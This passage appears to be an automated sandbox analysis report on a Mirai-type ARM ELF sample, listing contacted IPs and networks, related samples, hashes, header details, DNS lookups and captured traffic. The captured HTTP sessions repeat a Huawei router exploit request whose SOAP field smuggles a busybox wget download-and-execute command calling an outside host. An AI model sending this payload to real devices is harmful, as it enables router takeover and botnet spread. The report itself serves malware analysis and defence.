          24863LINKdotNET-ASEGfalse
          41.54.12.244
          unknownSouth Africa
          37168CELL-CZAfalse
          41.115.200.86
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          197.166.142.89
          unknownEgypt
          24863LINKdotNET-ASEGfalse
          41.142.174.179
          unknownMorocco
          36903MT-MPLSMAfalse
          197.221.180.248
          unknownSouth Africa
          37356O-TelZAfalse
          156.15.146.143
          unknownUnited States
          137ASGARRConsortiumGARREUfalse
          156.223.50.239
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          156.0.172.137
          unknownSouth Africa
          328112Linux-Based-Systems-Design-ASZAfalse
          156.123.110.253
          unknownUnited States
          393504XNSTGCAfalse
          156.92.15.84
          unknownUnited States
          10695WAL-MARTUSfalse
          41.142.174.171
          unknownMorocco
          36903MT-MPLSMAfalse
          197.4.54.29
          unknownTunisia
          5438ATI-TNfalse
          197.172.142.203
          unknownSouth Africa
          37168CELL-CZAfalse
          41.145.154.73
          unknownSouth Africa
          5713SAIX-NETZAfalse
          156.76.161.114
          unknownUnited States
          6341WIECUSfalse
          197.232.116.124
          unknownKenya
          36866JTLKEfalse
          41.14.214.42
          unknownSouth Africa
          29975VODACOM-ZAfalse
          197.143.201.70
          unknownAlgeria
          36891ICOSNET-ASDZfalse
          156.97.30.187
          unknownChile
          393504XNSTGCAfalse
          41.157.30.90
          unknownSouth Africa
          37168CELL-CZAfalse
          197.132.217.133
          unknownEgypt
          24835RAYA-ASEGfalse
          197.248.19.159
          unknownKenya
          37061SafaricomKEfalse
          41.85.32.165
          unknownSouth Africa
          22355FROGFOOTZAfalse
          197.211.66.68
          unknownSouth Africa
          29918IMPOL-ASNZAfalse
          156.141.177.52
          unknownUnited States
          29975VODACOM-ZAfalse
          197.128.22.138
          unknownMorocco
          6713IAM-ASMAfalse
          41.37.180.56
          unknownEgypt
          8452TE-ASTE-ASEGfalse
          41.195.197.32
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          41.108.48.195
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          41.122.114.255
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          197.114.121.166
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          156.141.206.213
          unknownUnited States
          29975VODACOM-ZAfalse
          197.175.223.202
          unknownSouth Africa
          37168CELL-CZAfalse
          41.240.121.95
          unknownSudan
          36998SDN-MOBITELSDfalse
          41.145.154.80
          unknownSouth Africa
          5713SAIX-NETZAfalse
          41.216.23.3
          unknownunknown
          36974AFNET-ASCIfalse
          156.61.32.129
          unknownUnited Kingdom
          39400LBH-ASCountyCouncilGBfalse
          197.118.32.246
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          197.26.6.251
          unknownTunisia
          37492ORANGE-TNfalse
          156.149.192.248
          unknownNew Zealand
          137ASGARRConsortiumGARREUfalse
          41.102.136.60
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          197.103.64.238
          unknownSouth Africa
          3741ISZAfalse
          197.71.86.129
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          41.101.160.236
          unknownAlgeria
          36947ALGTEL-ASDZfalse
          156.94.45.226
          unknownUnited States
          10695WAL-MARTUSfalse
          41.19.31.127
          unknownSouth Africa
          29975VODACOM-ZAfalse
          197.76.213.148
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          197.96.124.53
          unknownSouth Africa
          3741ISZAfalse
          41.126.84.6
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          197.91.228.137
          unknownSouth Africa
          10474OPTINETZAfalse
          156.61.32.147
          unknownUnited Kingdom
          39400LBH-ASCountyCouncilGBfalse
          41.247.245.223
          unknownSouth Africa
          5713SAIX-NETZAfalse
          156.49.160.53
          unknownSweden
          29975VODACOM-ZAfalse
          156.175.120.74
          unknownEgypt
          36992ETISALAT-MISREGfalse
          41.247.245.226
          unknownSouth Africa
          5713SAIX-NETZAfalse
          41.253.49.147
          unknownLibyan Arab Jamahiriya
          21003GPTC-ASLYfalse
          197.75.183.116
          unknownSouth Africa
          16637MTNNS-ASZAfalse
          41.133.63.99
          unknownSouth Africa
          10474OPTINETZAfalse
          41.227.43.75
          unknownTunisia
          2609TN-BB-ASTunisiaBackBoneASTNfalse
          197.212.239.103
          unknownZambia
          37287ZAIN-ZAMBIAZMfalse
          41.82.47.250
          unknownSenegal
          8346SONATEL-ASAutonomousSystemEUfalse
          197.169.124.243
          unknownSouth Africa
          37168CELL-CZAfalse
          197.211.66.87
          unknownSouth Africa
          29918IMPOL-ASNZAfalse
          41.92.196.155
          unknownCameroon
          15964CAMNET-ASCMfalse
          41.89.178.128
          unknownKenya
          36914KENET-ASKEfalse
          197.164.175.184
          unknownEgypt
          24863LINKdotNET-ASEGfalse
          41.139.156.183
          unknownKenya
          37061SafaricomKEfalse
          41.82.166.188
          unknownSenegal
          8346SONATEL-ASAutonomousSystemEUfalse
          41.227.43.85
          unknownTunisia
          2609TN-BB-ASTunisiaBackBoneASTNfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          197.40.144.1947n89nEPSkV.elfGet hashmaliciousMirai, GafgytBrowse
            x86.elfGet hashmaliciousMiraiBrowse
              v9lIRQBhwB.elfGet hashmaliciousMiraiBrowse
                Aa8DegXYI6.elfGet hashmaliciousMirai, MoobotBrowse
                  b6pO3D90hhGet hashmaliciousUnknownBrowse
                    qYPsFsdb1KGet hashmaliciousMiraiBrowse
                      41.92.37.112oN8nC8kDlL.elfGet hashmaliciousMirai, MoobotBrowse
                        AP7H3dk8Ul.elfGet hashmaliciousMirai, MoobotBrowse
                          a9978gmF7i.elfGet hashmaliciousMiraiBrowse
                            Mc7aTFVmmvGet hashmaliciousMiraiBrowse
                              armGet hashmaliciousUnknownBrowse
                                x86Get hashmaliciousMiraiBrowse
                                  ImttRz9esvGet hashmaliciousMiraiBrowse
                                    X7AvBM4NoOGet hashmaliciousMiraiBrowse
                                      156.139.26.114x86Get hashmaliciousMiraiBrowse
                                        IPanSZNhNeGet hashmaliciousMiraiBrowse
                                          068iG6omAZGet hashmaliciousMiraiBrowse
                                            apep.x86Get hashmaliciousUnknownBrowse
                                              u47x3rc20tGet hashmaliciousMiraiBrowse
                                                41.127.73.187KVDg3OQlnjGet hashmaliciousUnknownBrowse
                                                  m5vMDP64fyGet hashmaliciousMiraiBrowse
                                                    156.246.150.166RQsecy8d0u.elfGet hashmaliciousMirai, MoobotBrowse
                                                      8x5xUJHMnPGet hashmaliciousMiraiBrowse
                                                        156.61.32.101SecuriteInfo.com.FileRepMalware.20155.16240.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          x86_64-20220412-0247Get hashmaliciousMirai MoobotBrowse
                                                            x86Get hashmaliciousMiraiBrowse
                                                              156.249.107.15uk1Iq7l4Ii.elfGet hashmaliciousMiraiBrowse
                                                                LbyNq4T3Q5Get hashmaliciousMiraiBrowse
                                                                  11whWAjKqkGet hashmaliciousGafgyt, MiraiBrowse
                                                                    wTd0V97sFsGet hashmaliciousMiraiBrowse
                                                                      156.234.199.254db0fa4b8db0333367e9bda3ab68b8042.m68kGet hashmaliciousMiraiBrowse
                                                                        6YmzmvBuGwGet hashmaliciousMiraiBrowse
                                                                          27u3GFbxGRGet hashmaliciousMiraiBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            retardedclassmate.dynarm.elfGet hashmaliciousMiraiBrowse
                                                                            • 37.49.229.111
                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 89.32.41.31
                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 37.49.229.111
                                                                            fO2rP8QsI9.elfGet hashmaliciousMiraiBrowse
                                                                            • 89.32.41.31
                                                                            9Iakt8wQQ7.elfGet hashmaliciousGafgytBrowse
                                                                            • 103.161.35.44
                                                                            SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 154.197.110.191
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ASMediMA06V2RO89xu.elfGet hashmaliciousMiraiBrowse
                                                                            • 196.115.234.44
                                                                            hydro.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                            • 105.188.103.103
                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 197.153.85.14
                                                                            ZXZMRvEA9M.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.92.113.21
                                                                            ACKpfvO313.elfGet hashmaliciousMiraiBrowse
                                                                            • 197.153.12.69
                                                                            bot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 197.247.53.50
                                                                            bot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 41.92.113.48
                                                                            bot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 197.153.73.28
                                                                            bot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 197.153.24.26
                                                                            bot.mpsl-20240528-2108.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 197.153.119.227
                                                                            LEVEL3USuxO2FYr0cj.elfGet hashmaliciousMiraiBrowse
                                                                            • 9.125.205.105
                                                                            ycWb26lVAe.elfGet hashmaliciousMiraiBrowse
                                                                            • 4.203.130.44
                                                                            vg664Y4air.elfGet hashmaliciousMiraiBrowse
                                                                            • 4.67.215.116
                                                                            GziBfLibYb.elfGet hashmaliciousMiraiBrowse
                                                                            • 9.38.175.241
                                                                            kzERQcdqmc.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                            • 8.68.14.51
                                                                            9tsURXMAdT.exeGet hashmaliciousNjratBrowse
                                                                            • 4.203.104.98
                                                                            kLvAyodXfb.elfGet hashmaliciousMiraiBrowse
                                                                            • 9.3.199.188
                                                                            wwMb7UT8rQ.elfGet hashmaliciousMiraiBrowse
                                                                            • 8.195.74.12
                                                                            Pb0GaINSjK.elfGet hashmaliciousMiraiBrowse
                                                                            • 4.21.18.247
                                                                            v2z756r9LQ.elfGet hashmaliciousUnknownBrowse
                                                                            • 65.59.65.45
                                                                            TE-ASTE-ASEG5klOcqqL2D.elfGet hashmaliciousMiraiBrowse
                                                                            • 156.192.83.120
                                                                            ycWb26lVAe.elfGet hashmaliciousMiraiBrowse
                                                                            • 156.209.195.65
                                                                            Hj8k38lJRF.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.44.6.228
                                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.235.75.240
                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.45.223.167
                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 156.214.15.156
                                                                            HRJiIRr1Hp.elfGet hashmaliciousUnknownBrowse
                                                                            • 156.222.71.203
                                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                                            • 154.180.167.159
                                                                            VKKRDq3ZNl.exeGet hashmaliciousNjratBrowse
                                                                            • 41.37.102.78
                                                                            aoXLsHGJOX.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.233.156.55
                                                                            MTNNS-ASZAg5ns2jpAyk.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.121.172.222
                                                                            1w3BDu68Sg.dllGet hashmaliciousWannacryBrowse
                                                                            • 196.22.85.2
                                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.126.84.4
                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.122.213.76
                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.113.157.249
                                                                            c5v0GdZbbM.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 197.67.5.181
                                                                            HRJiIRr1Hp.elfGet hashmaliciousUnknownBrowse
                                                                            • 41.116.198.180
                                                                            oWWFhzvYZa.elfGet hashmaliciousMiraiBrowse
                                                                            • 197.76.213.135
                                                                            lMIVD0KqYQ.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.117.250.86
                                                                            gI7kdes69D.elfGet hashmaliciousMiraiBrowse
                                                                            • 41.113.110.213
                                                                            No context
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
                                                                            Entropy (8bit):7.730566308935513
                                                                            TrID:
                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                            File name:arm4.elf
                                                                            File size:64'712 bytes
                                                                            MD5:c0294f7f6da4f65b3f88b601abfcbe8b
                                                                            SHA1:86749bac75e1d5f5c7fa91bc9a06b8694f3f99c9
                                                                            SHA256:6b8065c3761f5f53eb5650d4fb77bde7e5a97ee43e8894fcf1794a76ccd186d5
                                                                            SHA512:600801675252683ab43d8e424c7166c53000f18a65a8c9b39d74292c7501b7b80d081d1876495e3024e25c2b50c0ffea39831afbcee24cb9d535ec31b7d7094f
                                                                            SSDEEP:1536:J9ipltH66ZB9LGDoOkR5nefu++9tA4q87DCLO6j+tqyEhtW:LiPtHdZB9Lim5nIEQE69j+tNUtW
                                                                            TLSH:C65301E7DE468324C259113812AAF7CEE88607D0F9C67D61AAF200D8436F5B1B45E7A3
                                                                            File Content Preview:.ELF...a..........(.....Hr..4...........4. ...(.........................................`...`...`...................Q.td............................a.P.UPX!.........:...:......_.........ELF.ra....(........4..P9...... ..........,.......l....7..l...v.I..`..

                                                                            ELF header

                                                                            Class:ELF32
                                                                            Data:2's complement, little endian
                                                                            Version:1 (current)
                                                                            Machine:ARM
                                                                            Version Number:0x1
                                                                            Type:EXEC (Executable file)
                                                                            OS/ABI:ARM - ABI
                                                                            ABI Version:0
                                                                            Entry Point Address:0x17248
                                                                            Flags:0x202
                                                                            ELF Header Size:52
                                                                            Program Header Offset:52
                                                                            Program Header Size:32
                                                                            Number of Program Headers:3
                                                                            Section Header Offset:0
                                                                            Section Header Size:40
                                                                            Number of Section Headers:0
                                                                            Header String Table Index:0
                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                            LOAD0x00x80000x80000xfbb00xfbb07.73200x5R E0x8000
                                                                            LOAD0xe600x38e600x38e600x00x00.00000x6RW 0x8000
                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jun 8, 2024 15:05:04.421430111 CEST192.168.2.1551.77.149.1390x13d2Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:05.692194939 CEST192.168.2.15178.254.22.1660xabc8Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:05.716953039 CEST192.168.2.1551.254.162.590x1917Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.593036890 CEST192.168.2.15185.181.61.240xeafdStandard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.639985085 CEST192.168.2.1594.16.114.2540x2ef4Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.653429985 CEST192.168.2.1594.16.114.2540x2ef4Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.665630102 CEST192.168.2.1594.16.114.2540x2ef4Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.676894903 CEST192.168.2.1594.16.114.2540x2ef4Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.688319921 CEST192.168.2.1594.16.114.2540x2ef4Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.712654114 CEST192.168.2.15178.254.22.1660xf5e0Standard query (0)retardedclassmate.dynA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jun 8, 2024 15:05:04.823196888 CEST51.77.149.139192.168.2.150x13d2No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:04.823196888 CEST51.77.149.139192.168.2.150x13d2No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:05.703716993 CEST178.254.22.166192.168.2.150xabc8No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:05.703716993 CEST178.254.22.166192.168.2.150xabc8No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:05.735656977 CEST51.254.162.59192.168.2.150x1917No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:05.735656977 CEST51.254.162.59192.168.2.150x1917No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.626099110 CEST185.181.61.24192.168.2.150xeafdNo error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.626099110 CEST185.181.61.24192.168.2.150xeafdNo error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.720103025 CEST178.254.22.166192.168.2.150xf5e0No error (0)retardedclassmate.dyn89.32.41.31A (IP address)IN (0x0001)false
                                                                            Jun 8, 2024 15:05:06.720103025 CEST178.254.22.166192.168.2.150xf5e0No error (0)retardedclassmate.dyn37.49.229.111A (IP address)IN (0x0001)false
                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            0192.168.2.153649041.197.21.18737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731107950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1192.168.2.153863441.220.10.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731223106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2192.168.2.155880241.13.27.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731245041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3192.168.2.153559441.26.61.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731245041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4192.168.2.155596441.9.160.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731302977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
